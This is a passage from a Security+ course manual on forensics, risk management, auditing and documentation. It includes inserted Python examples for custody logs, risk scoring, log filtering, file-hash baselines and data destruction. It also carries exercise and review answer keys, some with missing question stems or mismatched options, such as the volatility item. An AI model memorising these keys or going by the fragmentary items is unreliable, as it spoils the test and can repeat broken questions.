- When the evidence changed custody and when and how the transfer occurred. If the evidence changed possession, then the exchanging parties should sign the document.
Examination and analysis
After the evidence has been properly collected and documented, each piece of data and how the pieces relate to each other are examined in an attempt to recreate the crime. The focus is on answering the four questions of what, where, when, and how. If sufficient information is available, the questions of who and why may be pursued as well. This portion of the process is partially skill and experience and partially intuition; one clue may lead to others to develop an impression of what happened. Additional evidence may be required for further analysis in an attempt to positively establish the answers to the questions.
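As an added example, not part of the manual, the following Python code computes a mathematical validation code for an acquired image (SHA-256 is an assumption; the text names no particular algorithm), verifies a working copy against it, and keeps the chain-of-custody entries listed above, refusing a transfer that both exchanging parties have not signed. The names, timestamps, and image bytes are constructed.

```python
"""Added example (not from the manual): authenticates an acquired disk image
with a mathematical validation code (SHA-256, an assumed choice) and keeps a
chain-of-custody form.  Image bytes, names and timestamps are constructed."""
import hashlib
import hmac


def validation_code(data: bytes) -> str:
    """The validation code for a piece of evidence: a SHA-256 digest of its bytes."""
    return hashlib.sha256(data).hexdigest()


class EvidenceRecord:
    """One item of evidence plus its chain-of-custody entries.

    Timestamps are ISO 8601 strings supplied by the caller so the record is
    reproducible and does not depend on the clock."""

    def __init__(self, evidence_id, description, discovered_by, location, when, image: bytes):
        self.evidence_id = evidence_id
        self.description = description
        self.original_hash = validation_code(image)    # taken once, at acquisition
        self.entries = []
        self._log("discovered", discovered_by, location, when, custodian=discovered_by)

    def _log(self, action, who, location, when, note="", custodian=None):
        entry = {"action": action, "who": who, "location": location,
                 "time": when, "note": note, "custodian": custodian}
        self.entries.append(entry)
        return entry

    def current_custodian(self):
        for entry in reversed(self.entries):
            if entry["custodian"]:
                return entry["custodian"]
        return None

    def transfer(self, to_person, location, when, signatures):
        """Hand the evidence over; both exchanging parties must sign the form."""
        holder = self.current_custodian()
        if set(signatures) != {holder, to_person}:
            raise ValueError("transfer requires the signatures of both exchanging parties")
        return self._log("transfer", f"{holder} -> {to_person}", location, when,
                         note="signed by " + ", ".join(sorted(signatures)),
                         custodian=to_person)

    def verify_copy(self, copy: bytes, examiner, location, when) -> bool:
        """Check that a working copy still matches the original image, and log the check."""
        ok = hmac.compare_digest(validation_code(copy), self.original_hash)
        self._log("verify", examiner, location, when, note="match" if ok else "MISMATCH")
        return ok

    def custody_periods(self):
        """(custodian, start, end) for every custody period; end is None for the holder."""
        custodial = [e for e in self.entries if e["custodian"]]
        periods = []
        for i, entry in enumerate(custodial):
            end = custodial[i + 1]["time"] if i + 1 < len(custodial) else None
            periods.append((entry["custodian"], entry["time"], end))
        return periods
```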
A-1:
Exercises
1 _______________ is information and data of investigative value that is stored on or transmitted by an electronic system such as a computer.
2 Arrange the following in the order of the forensic process:
___ Analysis
___ Collection
___ Examination
___ Preparation
___ Documentation
4, 2, 3, 1, 5
3 Which item is most volatile?
A Time sensitive
B Extremely volatile
C Highly susceptible to tampering
D Often concealed
E All of the above
5 The purpose of __________ is keeping track of persons who have accessed the evidence.
chain of custody
6 The generation of mathematical validation codes of collected digital evidence is called ___________.
authentication
Where, when, and by whom was the evidence discovered?
Where, when, and by whom was the evidence handled or examined?
Who had custody of the evidence? During what period? How was it stored?
What were the physical attributes of the discovered evidence?
8 Electronic __________ act as a means of protection for the computer forensic specialist against potential allegations that files were altered or planted by law enforcement officials during the processing of the computer evidence.
signatures
Managing risk
Explanation
Unless an organization has unlimited resources, the network administrators will probably not be able to entirely secure everything under their control. Risk management is the process through which risks are identified and controls are put in place to minimize or mitigate the effects of resulting breaches. An analysis of risk, possible actions to mitigate or eliminate that risk, and the potential gains from implementing those actions should be done to determine appropriate security levels. In order to appropriately manage risk, valuable assets must be identified, and an assessment of risk to those assets must be made, including recognition of specific threats that would put those assets at risk. Finally, this process should result in a list of critical vulnerabilities that should be addressed.
Asset identification
Risk management starts with the identification of the assets that need protection. Assets are simply things that are of value. This usually includes data on the systems, as well as CPU time and network use, but may also include other system assets. In addition to identification, a value should be placed on each asset, as in how much would it cost to replace if it were lost, stolen, or became unavailable for a period.
Risk assessment
Risk is the potential for an occurrence that may put an asset in jeopardy. It is impossible to eliminate all risks associated with asset preservation. It is, however, important to control or reduce areas of high risk, particularly when the cost of that risk being realized is also high. Identifying risk is critical, and so is enumerating all known potential risks.
Threat identification
For a risk to be realized and an asset loss to be incurred, a corresponding threat must be present. For instance, an e-mail virus is not a threat on systems that do not handle e-mail in any way, and network breaches are much less of a threat on isolated systems or networks. For each risk identified in the previous section, the related threats should be listed. This may be a cyclical process: as threats are identified, other assets or risks may be uncovered, which will require further enumeration of threats.
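The three steps above (value the assets, enumerate the risks, list only the threats that actually apply) worked as code. This is an added example and not part of the course material: the asset and threat lists, and the scoring model (expected annual loss = replacement value x annual likelihood, counted only where the threat's prerequisites match the asset), are assumptions made for illustration.

```python
"""Added example (not course code): a small quantitative risk register.
Assets, threats, values and likelihoods below are constructed for the example;
the scoring model is an assumption, not one the course prescribes."""

from dataclasses import dataclass, field


@dataclass(frozen=True)
class Asset:
    name: str
    replacement_value: float                      # cost to replace or recover
    properties: frozenset = field(default_factory=frozenset)  # e.g. {"email", "networked"}


@dataclass(frozen=True)
class Threat:
    name: str
    annual_likelihood: float                      # probability per year, 0..1
    requires: frozenset                           # properties an asset must expose


def applicable(threat, asset):
    """A threat only counts against an asset that exposes what it needs: the
    text's e-mail virus is no threat to a host that never handles e-mail, and a
    network intrusion is no threat to an isolated one."""
    return threat.requires <= asset.properties


def exposure(asset, threat):
    """Expected annual loss for one asset/threat pair (assumed model)."""
    if not applicable(threat, asset):
        return 0.0
    return asset.replacement_value * threat.annual_likelihood


def risk_register(assets, threats):
    """(asset, threat, expected_loss) for every applicable pair, largest first:
    the prioritised list of vulnerabilities the process should end with."""
    rows = [
        (a.name, t.name, exposure(a, t))
        for a in assets
        for t in threats
        if applicable(t, a)
    ]
    return sorted(rows, key=lambda r: r[2], reverse=True)


# Constructed sample data; likelihoods are exact binary fractions so the
# expected-loss figures come out as round numbers.
ASSETS = [
    Asset("mail-server", 50_000, frozenset({"email", "networked"})),
    Asset("file-server", 80_000, frozenset({"networked"})),
    Asset("lab-workstation", 3_000, frozenset()),            # isolated, no e-mail
]
THREATS = [
    Threat("e-mail virus", 0.25, frozenset({"email"})),
    Threat("network intrusion", 0.125, frozenset({"networked"})),
    Threat("hardware failure", 0.0625, frozenset()),         # applies to everything
]

if __name__ == "__main__":
    for asset, threat, loss in risk_register(ASSETS, THREATS):
        print(f"{asset:16s} {threat:18s} expected loss/yr: {loss:9.2f}")
```

The isolated workstation only ever appears against hardware failure; the e-mail server against the virus tops the list even though the file server is worth more, because the applicable threat is far more likely. Replacing the assumed model with the organization's own loss figures does not change the structure.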
B-1:
Exercises
1 Risk management starts with the identification of the assets that need protection. True or false?
True
Identify and quantify assets to be safeguarded.
Measure the criticality of each asset by determining the impact of the loss of each asset.
Purchase insurance to cover all potential threats.
Identify and quantify the vulnerabilities associated with each asset when matched with each threat.
4 The greater the number and magnitude of ___________, the greater is the probability or risk that a loss event will occur.
threats
Communication
Social engineering preys on human vulnerabilities and a natural willingness to help. "Loose lips sink ships" applies as much to systems security as to the Navy. Usernames and passwords must be guarded conscientiously. Training should clearly delineate which information may never be divulged over the phone. Personnel authorized to provide such information should require proof of positive identity from the requester, or have a secure method of communicating the information that is available only to the intended recipient.
Online resources
Online delivery of educational materials, as well as of policies and procedures, is a very effective way of getting important information to a large number of people. One option is to create specific directories on the company's network to which users and/or IT personnel have access. Another is to create one or more areas on the company's internal Web site or intranet devoted to security and disaster recovery policies and procedures. These pages can include text as well as multimedia content, such as audio and video files. Further, IT personnel in particular can make use of resources on the Internet, such as knowledge bases and manufacturers' support Web sites, to help troubleshoot problems and obtain software updates and fixes.
C-1:
2 Name three ways that user awareness training can enhance system security.
Helps prevent accidental data loss. Places each user on the overall system security team and raises awareness that may lead a non-administrative user to identify a potential security problem or breach.
3 Which of the following items should be included in a custom-developed user security training and awareness package? (Choose all that apply.)
A Contacts and action in the event of a real or suspected security incident
B Legitimate use of system accounts
C Virus detection
D Overview of the network architecture
E Access and control of system media
F Sanitization of media and hard copies
4 Security-related pages on a companys internal Web site are an example of an online resource aimed primarily at IT personnel. True or false?
False
Topic D: Auditing
This topic covers the following CompTIA Security+ exam objective:
1.7  Understand the concept and significance of auditing, logging and system scanning
System monitoring
Explanation The best security procedures are of limited value if they are not tested to ensure that they work properly. Nor can they ever be assumed to be the final word: the system must be monitored continuously to ensure that the procedures provide the level of security required. Testing security procedures and monitoring their effectiveness are both aspects of auditing.
Auditing is an essential element of an overall security policy. Without good auditing procedures, a system is left vulnerable to attack. One important part of auditing is monitoring the system. This includes monitoring access to network resources, such as files, as well as monitoring specific actions by users. The audit information is written to a security log and records the identity of the user, the date and time of the action, and what action took place. Actions that can be logged include users signing on and signing off, modifying user or group account information, and reading and writing selected files. For each of these events, the audit entry in the security log indicates whether the action was a success or a failure. Recording all of these actions can make the log files very large, but they can be filtered to display only selected records. Another option is to display only failures.
In addition to monitoring, the other important part of auditing is scanning the system. Network and system security scanning reveals the vulnerabilities of the current system. Scanning also provides the following benefits:
Enables corrective action to take place in a timely fashion
Reduces the risk of attacks
Avoids litigation from customers
Reduces performance problems
Qualifies the organization for information protection insurance
Reveals upgrades needed for future expansion
System scanning typically involves two procedures. First, using well-known network and system assessment tools, the scan gathers information about the system and network configuration to determine vulnerable entry points that a hacker could use to gain access. Second, system scanning uses what is known as penetration testing: tools commonly used by hackers are used to simulate an actual intruder attack, but in a controlled and safe environment. By attempting to penetrate the system, the scan reveals the extent of the vulnerabilities. System scanning typically includes penetration testing from in-house locations, from the Internet, and through remote dial-in or broadband access.
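The monitoring side of auditing, worked over a constructed security log: each entry carries the user, the timestamp, the action and whether it succeeded, exactly the fields the text says an audit record needs, and the code produces the "failures only" view and a simple failed-logon count per user. This is an added example, not course material; the key=value log format, the sample entries and the failure threshold are assumptions.

```python
"""Added example (not course code): filtering and summarising a security log.
The line format and the entries in SAMPLE_LOG are constructed for the example."""

from collections import Counter
from datetime import datetime

# Constructed sample entries in an assumed "date time key=value ..." format.
SAMPLE_LOG = """\
2003-06-12 08:14:02 user=jsmith action=logon result=success
2003-06-12 08:15:40 user=jsmith action=read object=payroll.xls result=success
2003-06-12 08:20:11 user=mbrown action=logon result=failure
2003-06-12 08:20:19 user=mbrown action=logon result=failure
2003-06-12 08:20:27 user=mbrown action=logon result=failure
2003-06-12 08:21:03 user=mbrown action=logon result=failure
2003-06-12 09:02:55 user=jsmith action=modify_group object=Administrators result=failure
2003-06-12 09:30:00 user=jsmith action=logoff result=success
"""


def parse_entry(line):
    """One audit line -> dict with a datetime plus the key=value fields.
    Rejects lines missing who/what/outcome, since a record without them is useless."""
    date, clock, *pairs = line.split()
    entry = {"time": datetime.fromisoformat(f"{date} {clock}")}
    for pair in pairs:
        key, _, value = pair.partition("=")
        entry[key] = value
    for required in ("user", "action", "result"):
        if required not in entry:
            raise ValueError(f"malformed audit entry: {line!r}")
    return entry


def parse_log(text):
    return [parse_entry(line) for line in text.splitlines() if line.strip()]


def failures(entries):
    """The 'display only failures' view the text mentions."""
    return [e for e in entries if e["result"] == "failure"]


def failed_logons_by_user(entries):
    """Failed logons per user: the raw material for spotting password guessing."""
    return Counter(e["user"] for e in failures(entries) if e["action"] == "logon")


def suspicious_users(entries, threshold=3):
    """Users at or above `threshold` failed logons (threshold is an assumption)."""
    return sorted(u for u, n in failed_logons_by_user(entries).items() if n >= threshold)


def sensitive_failures(entries, actions=("modify_group", "modify_user")):
    """Failed attempts at account or group administration deserve their own review."""
    return [e for e in failures(entries) if e["action"] in actions]


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print("failures:", len(failures(entries)))
    print("suspicious:", suspicious_users(entries))
    for e in sensitive_failures(entries):
        print(e["time"], e["user"], e["action"], e.get("object"))
```

Filtering to failures alone already separates mbrown's burst of failed logons and jsmith's failed attempt on the Administrators group from the routine successes; the same functions work unchanged on a larger file, which is the point of filtering rather than reading a full log.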
System security scanning may be performed either in-house or by a third party. Some companies have the necessary resources and choose to audit their own security. The advantage of performing a security audit in-house is that the system can be scanned whenever necessary, such as when new systems are installed or configurations are changed. The disadvantage is that the audit may not be objective, and the skills and experience of in-house personnel may not be at the level needed. Third-party scanners typically offer a comprehensive report that describes the vulnerabilities detected, the risk associated with each, and recommendations for correcting the problem. Consulting companies that provide system-scanning services refer to it as a Security Vulnerability Assessment, a Security Audit, or On-line Penetration Testing. The audit should give detailed information on what tools were used, how and when the scan was conducted, and what vulnerabilities were scanned for, and it should list the vulnerabilities found by risk level.
A security scan should be conducted at least once per year. Companies that process financial transactions and medical records should conduct a security vulnerability assessment quarterly. Once an assessment has been performed, it is important to take corrective action immediately. This is audit escalation: the audit has revealed a problem, and its importance is adjusted accordingly. If a significant amount of time passes between the audit and the corrective action, many of the system settings may have changed, and the report on which the corrective action is based may no longer be accurate.
Some companies are reluctant to perform a security scan audit for fear that it will reveal a security problem and expose the organization to litigation. Audit privilege laws are traditionally set up to protect participating companies from the disclosure of violations found during an audit. In return, the company is given advice on how to correct the problem in order to achieve the necessary level of security.
Audit usage is also a key part of auditing. Audit usage monitors the usage of the system and provides valuable information for future capacity planning. The information helps determine, for example, whether an investment in new applications provides a positive return, by tracking when and how they are being used.
D-1:
Understanding auditing
A Date and time of the action
B Identity of the user
C What action took place
D Whether the action was a success or failure
E All of the above
4 System scanning typically includes penetration testing from: (Choose all that apply.)
A Internal sources
B The Internet
C The firewall
D Remote dial-in or broadband access
E All of the above
A What tools were used
B How and when the scan was conducted
C Which threats were detected
D What vulnerabilities were detected and their risk level
E Recommendations for correcting the problem
6 An __________ ____________ is an indication that the audit has revealed a problem and its importance must be adjusted accordingly.
audit escalation
7 Discuss the pros and cons of doing security scanning in-house versus using a third party.
A third party will cost more but will also be more objective and thorough than an in-house team.
Topic E: Documentation
This topic covers the following CompTIA Security+ exam objective:
5.9  Understand and explain the following documentation concepts: Standards and Guidelines, Systems Architecture, Change Documentation, Logs and Inventories, Classification, Notification, Retention / Storage, Destruction
Change documentation
In addition to architecture documentation, each individual system should have a separate document that describes its initial state and all subsequent changes. This includes configuration information, patches applied, backup records, and even suspected breaches. Printouts of hash results and system dates of critical system files may be pasted into this book. System maintenance is much smoother with a comprehensive change document. For instance, when a patch is available for an operating system, it typically applies only in certain situations. Manually investigating whether a patch applies to every possible target system is very time consuming; if configuration logs are available for reference, the process is much quicker and more accurate.
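The "hash results and system dates of critical system files" that go into the change record, worked as code, and the same digest check is what the forensics exercise earlier in this unit calls authentication (mathematical validation codes over collected evidence). This is an added example, not course material: the baseline layout, the file names and the use of a temporary directory are assumptions made for the example.

```python
"""Added example (not course code): a hash-and-date baseline of critical files,
saved in a printable form, then compared after a tamper. File names and the
temporary working directory are assumptions for the example."""

import hashlib
import json
import os
import tempfile


def sha256_of(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large evidence images work too."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def authenticate(path, expected_sha256):
    """Forensic 'authentication': does the item still match its recorded digest?"""
    return sha256_of(path) == expected_sha256


def take_baseline(paths):
    """Digest, size and modification time per file. json.dumps(baseline, indent=2)
    is the printout that goes into the system's change record."""
    baseline = {}
    for p in paths:
        st = os.stat(p)
        baseline[p] = {"sha256": sha256_of(p), "size": st.st_size, "mtime_ns": st.st_mtime_ns}
    return baseline


def compare(baseline, current_paths):
    """Classify files as unchanged, modified, missing or added versus the baseline.
    The digest decides, not the timestamp: anyone who can write the file can put
    the old mtime back, but cannot produce a different file with the same SHA-256."""
    report = {"unchanged": [], "modified": [], "missing": [], "added": []}
    for p, rec in baseline.items():
        if not os.path.exists(p):
            report["missing"].append(p)
        elif sha256_of(p) != rec["sha256"]:
            report["modified"].append(p)
        else:
            report["unchanged"].append(p)
    report["added"] = [p for p in current_paths if p not in baseline]
    return report


def demo(workdir):
    """Baseline two constructed 'critical files', tamper with one while restoring
    its timestamp, add a third, and return the comparison (base names only)."""
    hosts = os.path.join(workdir, "hosts")
    sshd = os.path.join(workdir, "sshd_config")
    with open(hosts, "wb") as f:
        f.write(b"127.0.0.1 localhost\n")
    with open(sshd, "wb") as f:
        f.write(b"PermitRootLogin no\n")

    baseline = take_baseline([hosts, sshd])
    saved = json.loads(json.dumps(baseline))        # round trip through the printed form

    # Tamper: append to hosts, then put the old mtime back, as an intruder might.
    with open(hosts, "ab") as f:
        f.write(b"10.0.0.1 update.example\n")
    old = baseline[hosts]["mtime_ns"]
    os.utime(hosts, ns=(old, old))
    extra = os.path.join(workdir, "new.conf")
    with open(extra, "wb") as f:
        f.write(b"# unexpected file\n")

    report = compare(saved, [hosts, sshd, extra])
    result = {k: sorted(os.path.basename(p) for p in v) for k, v in report.items()}
    result["hosts_authentic"] = authenticate(hosts, saved[hosts]["sha256"])
    result["hosts_mtime_unchanged"] = os.stat(hosts).st_mtime_ns == saved[hosts]["mtime_ns"]
    return result


def run_demo():
    with tempfile.TemporaryDirectory() as d:
        return demo(d)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The tampered hosts file keeps its original modification time yet is reported as modified, which is why the printout pasted into the change record must carry the digest and not only the date. The same `authenticate` check is what lets an examiner show that a collected image has not changed since it was acquired.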
Destruction
Finally, appropriate methods for destroying data, records, and even entire systems should be detailed. Simply deleting a file does not remove it from the disk; it merely removes the pointer to the data, which remains recoverable until it is overwritten. Making the disk genuinely unreadable is a more complex process or requires physical destruction. If a system, or the data on it, has been identified as a corporate asset, then improper destruction is always a threat to that asset and should be treated as such.
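The software side of that "more complex process", as an added example that is not course material: overwrite the file's bytes before unlinking it, and know the cases in which even this is not enough. The pass count and the constructed file are assumptions.

```python
"""Added example (not course code): overwrite-then-unlink. The pass count and
the sample file are assumptions; the docstring lists what this does not defeat."""

import os
import tempfile


def overwrite_and_delete(path, passes=3):
    """Overwrite every allocated byte with random data, force it to the device,
    truncate, then unlink. Returns the number of bytes overwritten.

    What this does not defeat: SSD wear levelling, and copy-on-write,
    journaled or snapshotted file systems, can leave the old blocks untouched,
    and backups are unaffected. For media holding data classified as a
    corporate asset, degaussing, crypto-erase or physical destruction is the
    reliable path; this routine is a best effort on a plain spinning disk.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining > 0:
                chunk = os.urandom(min(remaining, 64 * 1024))
                f.write(chunk)
                remaining -= len(chunk)
            f.flush()
            os.fsync(f.fileno())       # make the pass reach the device, not just the cache
        f.truncate(0)                  # hide the old length in the metadata as well
        f.flush()
        os.fsync(f.fileno())
    os.remove(path)
    return size


def demo():
    """Create a constructed 'secret' file in a temporary directory, destroy it,
    and report how many bytes were overwritten and whether the file remains."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "customer-list.txt")
        with open(secret, "wb") as f:
            f.write(b"Confidential\n" * 1000)
        written = overwrite_and_delete(secret)
        return {"bytes_overwritten": written, "still_exists": os.path.exists(secret)}


if __name__ == "__main__":
    print(demo())
```

Note that the routine only touches the blocks the file currently occupies; earlier versions of the file, temporary copies made by editors, and slack space are outside its reach, which is the practical reason the text treats destruction as a policy matter rather than a single command.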
E-1:
Discussing documentation
Topic B
Topic C
Topic D
Topic E
Review questions
1 What is computer forensics?
The acquisition and analysis of evidence pertaining to a computer security incident.
Preparation
Collection of evidence
Authentication
Examination of evidence
Analysis of evidence
Documenting and reporting of evidence
4 Collecting evidence may destroy other evidence. True or false?
True
5 When collecting evidence, you should start by restarting the computer. True or false?
False. Do not shut down until the most volatile evidence has been collected.
8 Education about computer systems and potential security risks is one of the most cost-effective tools in computer security. True or false?
True
9 Security training should never be delivered online, because putting it online is a risk to the organization. True or false?
False. It is one of the most effective ways of delivering the information to large groups of users.
10 In auditing a system, what are the two procedures system scanning typically involves?
First, using well-known network and system assessment tools, the scan gathers information about the system and network configuration to determine vulnerable entry points that a hacker could use to gain access. Second, system scanning uses what is known as Penetration Testing.
11 System security scanning should only be done in-house since third-party scanning exposes the system to additional risks. True or false?
False. It can be a more objective scan if an outside party performs it.
Computer forensics and advanced topics
13 List the types of documentation you need to maintain for a secure network environment.
Standards and guidelines
Systems architecture
Change documentation
Logs and inventories
Classification and notification
Retention and storage
Destruction
14 Information intended only for the person to whom it was sent should be marked:
A Unclassified.
B Classified.
C Confidential.
D Secret.
1.4  Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk: DOS / DDOS (Denial of Service / Distributed Denial of Service), Back Door, Spoofing, Replay, TCP/IP Hijacking, Weak Keys, Mathematical, Social Engineering, Birthday, Password Guessing (Brute Force, Dictionary), Software Exploitation
1.5  Recognize the following types of malicious code and specify the appropriate actions to take to mitigate vulnerability and risk: Viruses, Trojan Horses, Logic Bombs, Worms
1.6  Understand the concept of and know how to reduce the risks of social engineering
1.7  Understand the concept and significance of auditing, logging and system scanning
Naming Conventions
2.6  Recognize and understand the administration of the following wireless technologies and concepts: WTLS (Wireless Transport Layer Security), 802.11 and 802.11x, WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol), Vulnerabilities, Site Surveys
Non-Repudiation, Digital Signatures, Access Control
4.3  Understand and be able to explain the following concepts of PKI (Public Key Infrastructure): Certificates, Certificate Policies, Certificate Practice Statements, Revocation, Trust Models
4.4  Identify and be able to differentiate different cryptographic standards and protocols
Environment, Wireless Cells, Location, Shielding, Fire Suppression
5.2  Understand the security implications of the following topics of disaster recovery: Backups, Off Site Storage, Secure Recovery, Alternate Sites, Disaster Recovery Plan
5.3  Understand the security implications of the following topics of business continuity: Utilities, High Availability / Fault Tolerance, Backups